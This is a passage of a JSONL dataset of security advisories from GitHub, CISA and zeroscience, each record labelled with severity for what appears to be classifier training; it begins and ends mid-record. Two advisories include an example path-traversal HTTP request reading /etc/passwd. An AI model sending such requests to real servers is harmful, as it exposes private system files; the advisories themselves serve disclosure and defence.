user account is inactive.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-10-03", "split": "train"} -{"id": "a3db922d85caf4546ed7", "text": "Incorrect check on buffer length in rand_core\n\nAn issue was discovered in the rand_core crate before 0.6.2 for Rust. Because `read_u32_into` and `read_u64_into` mishandle certain buffer-length checks, a random number generator may be seeded with too little data. The vulnerability was introduced in v0.6.0. The advisory doesn't apply to earlier minor version numbers.\n\nBecause read_u32_into and read_u64_into mishandle certain buffer-length checks, a random number generator may be seeded with too little data.", "text_raw": "Incorrect check on buffer length in rand_core\n\n[Severity: CRITICAL]\n\nAn issue was discovered in the rand_core crate before 0.6.2 for Rust. Because `read_u32_into` and `read_u64_into` mishandle certain buffer-length checks, a random number generator may be seeded with too little data. The vulnerability was introduced in v0.6.0. The advisory doesn't apply to earlier minor version numbers.\n\nBecause read_u32_into and read_u64_into mishandle certain buffer-length checks, a random number generator may be seeded with too little data.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "5025fbd9bf9dfbe46724", "text": "Improper Verification of Cryptographic Signature in golang.org/x/crypto\n\ngolang.org/x/crypto before v0.0.0-20200220183623-bac4c82f6975 for Go allows a panic during signature verification in the golang.org/x/crypto/ssh package. A client can attack an SSH server that accepts public keys. Also, a server can attack any SSH client.", "text_raw": "Improper Verification of Cryptographic Signature in golang.org/x/crypto\n\n[Severity: HIGH]\n\ngolang.org/x/crypto before v0.0.0-20200220183623-bac4c82f6975 for Go allows a panic during signature verification in the golang.org/x/crypto/ssh package. A client can attack an SSH server that accepts public keys. Also, a server can attack any SSH client.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-18", "split": "train"} -{"id": "fdfbe465b5e3d7b768d7", "text": "Data Flow Sanitation Issue Fix\n\n### Impact\nDue to missing sanitation in data flow it was possible for admin users to upload arbitrary executable files to the server.", "text_raw": "Data Flow Sanitation Issue Fix \n\n[Severity: HIGH]\n\n### Impact\nDue to missing sanitation in data flow it was possible for admin users to upload arbitrary executable files to the server.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-30", "split": "train"} -{"id": "63378c88277a4375f64a", "text": "Potential CSV Injection vector in OctoberCMS\n\n### Impact\nAny users with the ability to modify any data that could eventually be exported as a CSV file from the `ImportExportController` could potentially introduce a CSV injection into the data to cause the generated CSV export file to be malicious. This requires attackers to achieve the following before a successful attack can be completed:\n\n1. Have found a vulnerability in the victim's spreadsheet software of choice.\n2. Control data that would potentially be exported through the `ImportExportController` by a theoretical victim.\n3. Convince the victim to export above data as a CSV and run it in vulnerable spreadsheet software while also bypassing any sanity checks by said software.\n\n### Patches\nIssue has been patched in Build 466 (v1.0.466).\n\n### Workarounds\nApply https://github.com/octobercms/library/commit/c84bf03f506052c848f2fddc05f24be631427a1a & https://github.com/octobercms/october/commit/802d8c8e09a2b342649393edb6d3ceb958851484 to your installation manually if unable to upgrade to Build 466.\n\n### References\nReported by @chrisvidal initially & [Sivanesh Ashok](https://stazot.com/) later.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)", "text_raw": "Potential CSV Injection vector in OctoberCMS\n\n[Severity: MEDIUM]\n\n### Impact\nAny users with the ability to modify any data that could eventually be exported as a CSV file from the `ImportExportController` could potentially introduce a CSV injection into the data to cause the generated CSV export file to be malicious. This requires attackers to achieve the following before a successful attack can be completed: \n\n1. Have found a vulnerability in the victim's spreadsheet software of choice.\n2. Control data that would potentially be exported through the `ImportExportController` by a theoretical victim.\n3. Convince the victim to export above data as a CSV and run it in vulnerable spreadsheet software while also bypassing any sanity checks by said software.\n\n### Patches\nIssue has been patched in Build 466 (v1.0.466).\n\n### Workarounds\nApply https://github.com/octobercms/library/commit/c84bf03f506052c848f2fddc05f24be631427a1a & https://github.com/octobercms/october/commit/802d8c8e09a2b342649393edb6d3ceb958851484 to your installation manually if unable to upgrade to Build 466.\n\n### References\nReported by @chrisvidal initially & [Sivanesh Ashok](https://stazot.com/) later.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)\n\n### Threat assessment:\nGiven the number of hoops that a potential attacker would have to jump through, this vulnerability really boils down to the possibility of abusing the trust that a user may have in the export functionality of the project. Thus, this has been rated low severity as it requires vulnerabilities to also exist in other software used by any potential victims as well as successful social engineering attacks.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-06-03", "split": "train"} -{"id": "b0ffffbe63e87caed6cb", "text": "Missing Authorization in TYPO3 extension\n\nThe direct_mail extension through 5.2.3 for TYPO3 allows Information Disclosure via a newsletter subscriber data Special Query.", "text_raw": "Missing Authorization in TYPO3 extension\n\n[Severity: MEDIUM]\n\nThe direct_mail extension through 5.2.3 for TYPO3 allows Information Disclosure via a newsletter subscriber data Special Query.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-07-26", "split": "train"} -{"id": "6eab063c9df3726d844d", "text": "Mini FTP Server 1.1 Buffer Corruption Remote Denial Of Service Exploit", "text_raw": "Mini FTP Server 1.1 Buffer Corruption Remote Denial Of Service Exploit\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2011-08-28", "split": "train"} -{"id": "7b67ec8640b6b10ec438", "text": "Directory Traversal in chatbyvista\n\nAffected versions of `chatbyvista` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "text_raw": "Directory Traversal in chatbyvista\n\n[Severity: HIGH]\n\nAffected versions of `chatbyvista` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "994eec174c1443c2c6e8", "text": "Restlet Framework allows remote attackers to access arbitrary files via a crafted REST API HTTP request\n\nRestlet Framework before 2.3.12 allows remote attackers to access arbitrary files via a crafted REST API HTTP request that conducts an XXE attack, because only general external entities (not parameter external entities) are properly considered. This is related to XmlRepresentation, DOMRepresentation, SaxRepresentation, and JacksonRepresentation.", "text_raw": "Restlet Framework allows remote attackers to access arbitrary files via a crafted REST API HTTP request\n\n[Severity: HIGH]\n\nRestlet Framework before 2.3.12 allows remote attackers to access arbitrary files via a crafted REST API HTTP request that conducts an XXE attack, because only general external entities (not parameter external entities) are properly considered. This is related to XmlRepresentation, DOMRepresentation, SaxRepresentation, and JacksonRepresentation.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-10-17", "split": "train"} -{"id": "e768652ddfed857028b1", "text": "keycloak before version 4.0.0.final is vulnerable to a infinite loop in session replacement. A Keycloak cluster with multiple nodes could mishandle an expired session replacement and lead to an infinite loop. A malicious authenticated user could use this flaw to achieve Denial of Service on the server.", "text_raw": "Moderate severity vulnerability that affects org.keycloak:keycloak-core\n\n[Severity: MEDIUM]\n\nkeycloak before version 4.0.0.final is vulnerable to a infinite loop in session replacement. A Keycloak cluster with multiple nodes could mishandle an expired session replacement and lead to an infinite loop. A malicious authenticated user could use this flaw to achieve Denial of Service on the server.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-10-18", "split": "train"} -{"id": "9f24efac7735fc311f3c", "text": "Kirby .dev domains and some reverse proxy setups were treated as local\n\n### Impact\n\n#### About our registration block\n\nIn order to protect new installations on public servers that don't have an admin account for the Panel yet, we block account registration there by default. This is a security feature, which we implemented years ago in Kirby 2. It helps to avoid that you forget registering your first admin account on a public server.\n\nIn this case – without our security block – someone else might theoretically be able to find your site, find out it's running on Kirby, find the Panel and then register the account first. It's an unlikely situation, but it's still a certain risk.\n\nTo be able to register the first Panel account on a public server, you have to enforce the installer via a config setting. This helps to push all users to the best practice of registering your first Panel account on your local machine and upload it together with the rest of the site.\n\n#### The issue\n\nAs noted by [Jukka Rautanen](https://github.com/jukra), this installation block implementation in Kirby versions before 3.3.6 still assumed that .dev domains are local domains, which is no longer true. In the meantime, those domains became publicly available. This means that our installation block is no longer working as expected if you use a .dev domain for your Kirby site.\n\nIn fixing this issue, we've also found out that the local installation check may also fail if your site is behind a reverse proxy.\n\n#### Am I affected?\n\nYou are only affected if:\n\n1. you use a .dev domain or your site is behind a reverse proxy &\n2. you have not yet registered your first Panel account on the public server & \n3. someone finds your site and tries to login at `yourdomain.dev/panel` before you register your first account.\n\nYou are not affected if you have already created one or multiple Panel accounts (no matter if on a .dev domain or behind a reverse proxy).\n\n### Patches\n\nThe problem has been patched in [Kirby 2.5.14](https://github.com/getkirby-v2/panel/releases/tag/2.5.14) and [Kirby 3.3.6](https://github.com/getkirby/kirby/releases/tag/3.3.6). Please update to one of these or a [later version](https://github.com/getkirby/kirby/releases) to fix the vulnerability.\n\n**Note:** Kirby 2 reaches end of life on December 31, 2020. We therefore recommend to upgrade your Kirby 2 sites to Kirby 3. If you cannot upgrade, we still recommend to update to Kirby 2.5.14.\n\n### Workarounds\n\nKirby 2 sites on older releases can also be patched by applying the [changes from this commit](https://github.com/getkirby-v2/panel/commit/7f9ac1876bacb89fd8f142f5e561a02ebb725baa).", "text_raw": "Kirby .dev domains and some reverse proxy setups were treated as local\n\n[Severity: MEDIUM]\n\n### Impact\n\n#### About our registration block\n\nIn order to protect new installations on public servers that don't have an admin account for the Panel yet, we block account registration there by default. This is a security feature, which we implemented years ago in Kirby 2. It helps to avoid that you forget registering your first admin account on a public server. \n\nIn this case – without our security block – someone else might theoretically be able to find your site, find out it's running on Kirby, find the Panel and then register the account first. It's an unlikely situation, but it's still a certain risk.\n\nTo be able to register the first Panel account on a public server, you have to enforce the installer via a config setting. This helps to push all users to the best practice of registering your first Panel account on your local machine and upload it together with the rest of the site. \n\n#### The issue\n\nAs noted by [Jukka Rautanen](https://github.com/jukra), this installation block implementation in Kirby versions before 3.3.6 still assumed that .dev domains are local domains, which is no longer true. In the meantime, those domains became publicly available. This means that our installation block is no longer working as expected if you use a .dev domain for your Kirby site.\n\nIn fixing this issue, we've also found out that the local installation check may also fail if your site is behind a reverse proxy. \n\n#### Am I affected?\n\nYou are only affected if:\n\n1. you use a .dev domain or your site is behind a reverse proxy &\n2. you have not yet registered your first Panel account on the public server & \n3. someone finds your site and tries to login at `yourdomain.dev/panel` before you register your first account.\n\nYou are not affected if you have already created one or multiple Panel accounts (no matter if on a .dev domain or behind a reverse proxy).\n\n### Patches\n\nThe problem has been patched in [Kirby 2.5.14](https://github.com/getkirby-v2/panel/releases/tag/2.5.14) and [Kirby 3.3.6](https://github.com/getkirby/kirby/releases/tag/3.3.6). Please update to one of these or a [later version](https://github.com/getkirby/kirby/releases) to fix the vulnerability.\n\n**Note:** Kirby 2 reaches end of life on December 31, 2020. We therefore recommend to upgrade your Kirby 2 sites to Kirby 3. If you cannot upgrade, we still recommend to update to Kirby 2.5.14.\n\n### Workarounds\n\nKirby 2 sites on older releases can also be patched by applying the [changes from this commit](https://github.com/getkirby-v2/panel/commit/7f9ac1876bacb89fd8f142f5e561a02ebb725baa).", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-01-14", "split": "train"} -{"id": "5d9de94b20cccfd8b1d9", "text": "Division by zero in TFLite's implementation of `DepthwiseConv`\n\n### Impact\nThe implementation of the `DepthwiseConv` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/1a8e885b864c818198a5b2c0cbbeca5a1e833bc8/tensorflow/lite/kernels/depthwise_conv.cc#L287-L288):\n\n```cc\nint num_input_channels = SizeOfDimension(input, 3);\nTF_LITE_ENSURE_EQ(context, num_filter_channels % num_input_channels, 0);\n```\n\nAn attacker can craft a model such that `input`'s fourth dimension would be 0.\n\n### Patches\nWe have patched the issue in GitHub commit [cbda3c6b2dbbd3fbdc482ff8c0170a78ec2e97d0](https://github.com/tensorflow/tensorflow/commit/cbda3c6b2dbbd3fbdc482ff8c0170a78ec2e97d0).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information \nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "text_raw": "Division by zero in TFLite's implementation of `DepthwiseConv`\n\n[Severity: LOW]\n\n### Impact\nThe implementation of the `DepthwiseConv` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/1a8e885b864c818198a5b2c0cbbeca5a1e833bc8/tensorflow/lite/kernels/depthwise_conv.cc#L287-L288):\n\n```cc\nint num_input_channels = SizeOfDimension(input, 3);\nTF_LITE_ENSURE_EQ(context, num_filter_channels % num_input_channels, 0);\n```\n\nAn attacker can craft a model such that `input`'s fourth dimension would be 0.\n\n### Patches\nWe have patched the issue in GitHub commit [cbda3c6b2dbbd3fbdc482ff8c0170a78ec2e97d0](https://github.com/tensorflow/tensorflow/commit/cbda3c6b2dbbd3fbdc482ff8c0170a78ec2e97d0).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information \nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-05-21", "split": "train"} -{"id": "5494629d0b5ef0dd0132", "text": "Directory Traversal in Archive_Tar\n\nTar.php in Archive_Tar through 1.4.11 allows write operations with Directory Traversal due to inadequate checking of symbolic links, a related issue to CVE-2020-28948.\n\n### :exclamation: Note: \nThere was an [initial fix](https://github.com/pear/Archive_Tar/commit/cde460582ff389404b5b3ccb59374e9b389de916) for this vulnerability made in version `1.4.12`. That fix introduced a bug which was [fixed in 1.4.13](https://github.com/pear/Archive_Tar/pull/36). Therefore we have set the first-patched-version to `1.4.13` which the earliest working version that avoids this vulnerability.", "text_raw": "Directory Traversal in Archive_Tar\n\n[Severity: HIGH]\n\nTar.php in Archive_Tar through 1.4.11 allows write operations with Directory Traversal due to inadequate checking of symbolic links, a related issue to CVE-2020-28948.\n\n### :exclamation: Note: \nThere was an [initial fix](https://github.com/pear/Archive_Tar/commit/cde460582ff389404b5b3ccb59374e9b389de916) for this vulnerability made in version `1.4.12`. That fix introduced a bug which was [fixed in 1.4.13](https://github.com/pear/Archive_Tar/pull/36). Therefore we have set the first-patched-version to `1.4.13` which the earliest working version that avoids this vulnerability.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-04-22", "split": "train"} -{"id": "f7ec5aa51a1abeb103ac", "text": "Malicious Package in momen\n\nAll versions of `momen` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.\n\n## Recommendation\n\nRemove the package from your dependencies and always ensure package names are typed correctly upon installation.", "text_raw": "Malicious Package in momen\n\n[Severity: CRITICAL]\n\nAll versions of `momen` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.\n\n\n## Recommendation\n\nRemove the package from your dependencies and always ensure package names are typed correctly upon installation.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-02", "split": "train"} -{"id": "3190315b940e3a8876e0", "text": "Deserialization of Untrusted Data and Code Injection in xstream\n\nIt was found that xstream API version 1.4.10 before 1.4.11 introduced a regression for a previous deserialization flaw. If the security framework has not been initialized, it may allow a remote attacker to run arbitrary shell commands when unmarshalling XML or any supported format. e.g. JSON. (regression of CVE-2013-7285)", "text_raw": "Deserialization of Untrusted Data and Code Injection in xstream\n\n[Severity: CRITICAL]\n\nIt was found that xstream API version 1.4.10 before 1.4.11 introduced a regression for a previous deserialization flaw. If the security framework has not been initialized, it may allow a remote attacker to run arbitrary shell commands when unmarshalling XML or any supported format. e.g. JSON. (regression of CVE-2013-7285)", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2019-07-26", "split": "train"} -{"id": "29e16a77bd569b7592bd", "text": "Cross-Site Scripting in iobroker.web\n\nVersions of `iobroker.web` prior to 2.4.10 are vulnerable to Cross-Site Scripting. The package fails to escape URL parameters that may be reflected in the server response. This can be used by attackers to execute arbitrary JavaScript in the victim's browser.\n\n## Recommendation\n\nUpgrade to version 2.4.10 or later.", "text_raw": "Cross-Site Scripting in iobroker.web\n\n[Severity: MEDIUM]\n\nVersions of `iobroker.web` prior to 2.4.10 are vulnerable to Cross-Site Scripting. The package fails to escape URL parameters that may be reflected in the server response. This can be used by attackers to execute arbitrary JavaScript in the victim's browser.\n\n\n## Recommendation\n\nUpgrade to version 2.4.10 or later.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-12-02", "split": "train"} -{"id": "946dfd1e06c1454999e0", "text": "Newtec Satellite Modem MDM6000 2.2.5 Cross-Site Scripting Vulnerability", "text_raw": "Newtec Satellite Modem MDM6000 2.2.5 Cross-Site Scripting Vulnerability\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2016-08-21", "split": "train"} -{"id": "7795718dbe2af8436a1d", "text": "Duplicate Advisory: \"Arbitrary code execution in socket.io-file\"\n\n## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-6495-8jvh-f28x. This link is maintained to preserve external references.\n\n## Original Description\n\"The socket.io-file package through 2.0.31 for Node.js relies on client-side validation of file types, which allows remote attackers to execute arbitrary code by uploading an executable file via a modified JSON name field. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.\"", "text_raw": "Duplicate Advisory: \"Arbitrary code execution in socket.io-file\"\n\n[Severity: HIGH]\n\n## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-6495-8jvh-f28x. This link is maintained to preserve external references.\n\n## Original Description\n\"The socket.io-file package through 2.0.31 for Node.js relies on client-side validation of file types, which allows remote attackers to execute arbitrary code by uploading an executable file via a modified JSON name field. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.\"", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-10", "split": "train"} -{"id": "773622eca79359a55caf", "text": "Improper Handling of Exceptional Conditions in Apache Tomcat\n\nA vulnerability in Apache Tomcat allows an attacker to remotely trigger a denial of service. An error introduced as part of a change to improve error handling during non-blocking I/O meant that the error flag associated with the Request object was not reset between requests. This meant that once a non-blocking I/O error occurred, all future requests handled by that request object would fail. Users were able to trigger non-blocking I/O errors, e.g. by dropping a connection, thereby creating the possibility of triggering a DoS. Applications that do not use non-blocking I/O are not exposed to this vulnerability. This issue affects Apache Tomcat 10.0.3 to 10.0.4; 9.0.44; 8.5.64.", "text_raw": "Improper Handling of Exceptional Conditions in Apache Tomcat\n\n[Severity: HIGH]\n\nA vulnerability in Apache Tomcat allows an attacker to remotely trigger a denial of service. An error introduced as part of a change to improve error handling during non-blocking I/O meant that the error flag associated with the Request object was not reset between requests. This meant that once a non-blocking I/O error occurred, all future requests handled by that request object would fail. Users were able to trigger non-blocking I/O errors, e.g. by dropping a connection, thereby creating the possibility of triggering a DoS. Applications that do not use non-blocking I/O are not exposed to this vulnerability. This issue affects Apache Tomcat 10.0.3 to 10.0.4; 9.0.44; 8.5.64.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-13", "split": "train"} -{"id": "d9d4c49fe9d04aeb8397", "text": "Directory traversal vulnerability in actionpack\n\nDirectory traversal vulnerability in actionpack/lib/action_dispatch/middleware/static.rb in Action Pack in Ruby on Rails 3.x before 3.2.21, 4.0.x before 4.0.12, 4.1.x before 4.1.8, and 4.2.x before 4.2.0.beta4, when serve_static_assets is enabled, allows remote attackers to determine the existence of files outside the application root via vectors involving a \\ (backslash) character, a similar issue to CVE-2014-7818.", "text_raw": "Directory traversal vulnerability in actionpack\n\n[Severity: MEDIUM]\n\nDirectory traversal vulnerability in actionpack/lib/action_dispatch/middleware/static.rb in Action Pack in Ruby on Rails 3.x before 3.2.21, 4.0.x before 4.0.12, 4.1.x before 4.1.8, and 4.2.x before 4.2.0.beta4, when serve_static_assets is enabled, allows remote attackers to determine the existence of files outside the application root via vectors involving a \\ (backslash) character, a similar issue to CVE-2014-7818.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "f482075f9a98b1fea18a", "text": "Django open redirect and possible XSS attack via user-supplied numeric redirect URLs\n\nDjango 1.10 before 1.10.7, 1.9 before 1.9.13, and 1.8 before 1.8.18 relies on user input in some cases to redirect the user to an \"on success\" URL. The security check for these redirects (namely ``django.utils.http.is_safe_url()``) considered some numeric URLs \"safe\" when they shouldn't be, aka an open redirect vulnerability. Also, if a developer relies on ``is_safe_url()`` to provide safe redirect targets and puts such a URL into a link, they could suffer from an XSS attack.", "text_raw": "Django open redirect and possible XSS attack via user-supplied numeric redirect URLs\n\n[Severity: MEDIUM]\n\nDjango 1.10 before 1.10.7, 1.9 before 1.9.13, and 1.8 before 1.8.18 relies on user input in some cases to redirect the user to an \"on success\" URL. The security check for these redirects (namely ``django.utils.http.is_safe_url()``) considered some numeric URLs \"safe\" when they shouldn't be, aka an open redirect vulnerability. Also, if a developer relies on ``is_safe_url()`` to provide safe redirect targets and puts such a URL into a link, they could suffer from an XSS attack.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-01-04", "split": "train"} -{"id": "baff547d010c87a5d20d", "text": "Cisco IP Phones Web Server Remote Code Execution and Denial-of-Service Vulnerability\n\nAffected: Cisco Cisco IP Phones\n\nCisco IP Phones contain an improper input validation vulnerability for HTTP requests. Exploitation could allow an attacker to execute code remotely with root privileges or cause a denial-of-service (DoS) condition.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Cisco IP Phones Web Server Remote Code Execution and Denial-of-Service Vulnerability\n\nAffected: Cisco Cisco IP Phones\n\nCisco IP Phones contain an improper input validation vulnerability for HTTP requests. Exploitation could allow an attacker to execute code remotely with root privileges or cause a denial-of-service (DoS) condition.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "bb63f8c8adcfed5ffafa", "text": "Unsafe Deserialization in jackson-databind\n\nFasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS.", "text_raw": "Unsafe Deserialization in jackson-databind\n\n[Severity: HIGH]\n\nFasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-12-09", "split": "train"} -{"id": "622007033e76276a0059", "text": "Downloads Resources over HTTP in baryton-saxophone\n\nAffected versions of `baryton-saxophone` insecurely download an executable over an unencrypted HTTP connection.\n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `baryton-saxophone`.\n\n## Recommendation\n\nUpdate to version 3.0.1 or later.", "text_raw": "Downloads Resources over HTTP in baryton-saxophone\n\n[Severity: HIGH]\n\nAffected versions of `baryton-saxophone` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `baryton-saxophone`.\n\n\n## Recommendation\n\nUpdate to version 3.0.1 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "00cd5ff1e1f17f27b590", "text": "Prototype pollution in nconf-toml\n\nPrototype pollution vulnerability in `nconf-toml` versions 0.0.1 through 0.0.2 allows an attacker to cause a denial of service and may lead to remote code execution.", "text_raw": "Prototype pollution in nconf-toml\n\n[Severity: CRITICAL]\n\nPrototype pollution vulnerability in `nconf-toml` versions 0.0.1 through 0.0.2 allows an attacker to cause a denial of service and may lead to remote code execution.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-06-07", "split": "train"} -{"id": "efd2c951ffe879339d60", "text": "Command injection via Celery broker in Apache Airflow\n\nAn issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.", "text_raw": "Command injection via Celery broker in Apache Airflow\n\n[Severity: CRITICAL]\n\nAn issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-07-27", "split": "train"} -{"id": "e1fae5ab9edb96845711", "text": "Microsoft Windows Installer Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Installer contains a privilege escalation vulnerability when MSI packages process symbolic links, which allows attackers to bypass access restrictions to add or remove files.\n\nRequired Action: Apply updates per vendor instructions.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Microsoft Windows Installer Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Installer contains a privilege escalation vulnerability when MSI packages process symbolic links, which allows attackers to bypass access restrictions to add or remove files.\n\nRequired Action: Apply updates per vendor instructions.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "bc03788622491edbaf18", "text": "Arbitrary file reading vulnerability in Aim\n\n### Impact\nA path traversal attack aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files.\n\nVulnerable code: https://github.com/aimhubio/aim/blob/0b99c6ca08e0ba7e7011453a2f68033e9b1d1bce/aim/web/api/views.py#L9-L16\n\n### Patches\nThe vulnerability issue is resolved in Aim v3.1.0.\n\n### References\nhttps://owasp.org/www-community/attacks/Path_Traversal", "text_raw": "Arbitrary file reading vulnerability in Aim\n\n[Severity: CRITICAL]\n\n### Impact\nA path traversal attack aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files.\n\nVulnerable code: https://github.com/aimhubio/aim/blob/0b99c6ca08e0ba7e7011453a2f68033e9b1d1bce/aim/web/api/views.py#L9-L16\n\n### Patches\nThe vulnerability issue is resolved in Aim v3.1.0.\n\n### References\nhttps://owasp.org/www-community/attacks/Path_Traversal\n\n", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-11-23", "split": "train"} -{"id": "57b05bd7058c41162d71", "text": "Directory Traversal in list-n-stream\n\nAffected versions of `list-n-stream` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n## Recommendation\n\nUpdate to version 0.0.11 or later.", "text_raw": "Directory Traversal in list-n-stream\n\n[Severity: HIGH]\n\nAffected versions of `list-n-stream` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n\n## Recommendation\n\nUpdate to version 0.0.11 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-24", "split": "train"} -{"id": "a2cd8e577565745a9758", "text": "Ovidentia 7.9.4 Multiple Remote Vulnerabilities", "text_raw": "Ovidentia 7.9.4 Multiple Remote Vulnerabilities\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2013-08-22", "split": "train"} -{"id": "c5e181256574a59b05c1", "text": "Cross-site scripting in RESTEasy\n\nA cross-site scripting (XSS) flaw was found in RESTEasy in versions before 3.11.1.Final and before 4.5.3.Final, where it did not properly handle URL encoding when the RESTEASY003870 exception occurs. An attacker could use this flaw to launch a reflected XSS attack.", "text_raw": "Cross-site scripting in RESTEasy\n\n[Severity: MEDIUM]\n\nA cross-site scripting (XSS) flaw was found in RESTEasy in versions before 